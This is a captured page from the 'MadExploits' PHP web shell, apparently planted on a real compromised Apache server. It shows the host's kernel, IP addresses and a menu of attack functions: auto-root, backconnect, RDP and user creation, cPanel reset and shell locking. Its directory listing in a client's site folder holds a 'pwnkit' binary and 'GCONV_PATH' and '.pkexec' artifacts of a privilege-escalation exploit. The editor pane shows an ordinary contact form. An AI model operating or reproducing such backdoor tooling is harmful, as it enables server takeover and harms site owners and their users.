Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.218.107.101
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
micro /
theme /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
icons
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
about.php
5.97
KB
-rw-r--r--
contact.php
5.88
KB
-rw-r--r--
highlights.php
5.41
KB
-rw-r--r--
index.php
15.11
KB
-rw-r--r--
login.php
88
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
shipping.php
745
B
-rw-r--r--
single-product.php
9.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contact.php
<?php include("includes/header.php"); ?> <section class="bc-gray section-2 pos-relative"> <div class="custom-container"> <h1 class="h2-heading">contact us</h1> <div class="hr-v1 width-605"></div> <div class="loop-text flex-js-b gap-1-5"> <div class="width-605"> <form action="#" class="contact_form text-heading" id="contact_form1" method="post" accept-charset="utf-8"> <div class="row-clearfix"> <div class="input-div mb-24"> <label for="username">your name</label> <input type="text" id="form_name" name="form_name" class="w-100 form-input" placeholder="Enter your name" required=""> </div> <div class="input-div mb-24"> <label for="user-email">your Email</label> <input type="email" id="form_email" name="form_email" class="w-100 form-input" placeholder="test@mail.com" required=""> </div> <div class="input-div mb-24"> <label for="Subject">Subject</label> <select id="subject-options" class="w-100 form-input" name="options"> <option value="option1">Select Subject </option> <option value="option2">bulk order pricing</option> <option value="option3">Option 3</option> <option value="option4">Option 4</option> </select> </div> <div class="input-div mb-24"> <label for="more-info">Message</label> <textarea id="form_message" name="form_message" class="w-100 form-input" placeholder="Placeholder text here"></textarea> </div> <div class="input-div"> <button class="btn-cm fm-btn" type="submit" name="submit-form">Send message</button> </div> </div> </form> </div> <div class="width-605 flex-col faq-container"> <h3 class="h3-heading mb-32">frequently asked questions</h3> <div class="faq faq-contect active"> <h3 class="faq-question"> What types of patches and badges do you manufacture? </h3> <div class="faq-answer color-gray cpas"> <div class="text-div"> We use high-quality materials such as polyester, cotton, felt, PVC, leather, and various threads to ensure durability and vibrant colors. </div> </div> </div> <!--1 --> <div class="faq faq-contect"> <h3 class="faq-question"> What materials do you use for your patches and badges? </h3> <div class="faq-answer color-gray cpas"> <div class="text-div"> <p>We operate in [City/Region], covering all neighborhoods and surrounding areas. Please contact us for more detailed information on specific locations.</p> </div> </div> </div> <!--1 --> <div class="faq faq-contect"> <h3 class="faq-question"> Can you customize patches and badges according to my design? </h3> <div class="faq-answer color-gray cpas"> <div class="text-div"> <p>We operate in [City/Region], covering all neighborhoods and surrounding areas. Please contact us for more detailed information on specific locations.</p> </div> </div> </div> <div class="faq faq-contect"> <h3 class="faq-question"> What materials do you use for your patches and badges? </h3> <div class="faq-answer color-gray cpas"> <div class="text-div"> <p>We operate in [City/Region], covering all neighborhoods and surrounding areas. Please contact us for more detailed information on specific locations.</p> </div> </div> </div> <!--1 --> <div class="faq faq-contect"> <h3 class="faq-question"> What is the minimum order quantity (MOQ)? </h3> <div class="faq-answer color-gray cpas"> <div class="text-div"> <p>We operate in [City/Region], covering all neighborhoods and surrounding areas. Please contact us for more detailed information on specific locations.</p> </div> </div> </div> <!--1 --> <div class="faq faq-contect"> <h3 class="faq-question"> How long does it take to produce a custom patch or badge? </h3> <div class="faq-answer color-gray cpas"> <div class="text-div"> <p>We operate in [City/Region], covering all neighborhoods and surrounding areas. Please contact us for more detailed information on specific locations.</p> </div> </div> </div> <!--1 --> </div> </div> </div> </section> <?php include("includes/footer.php"); ?>
Close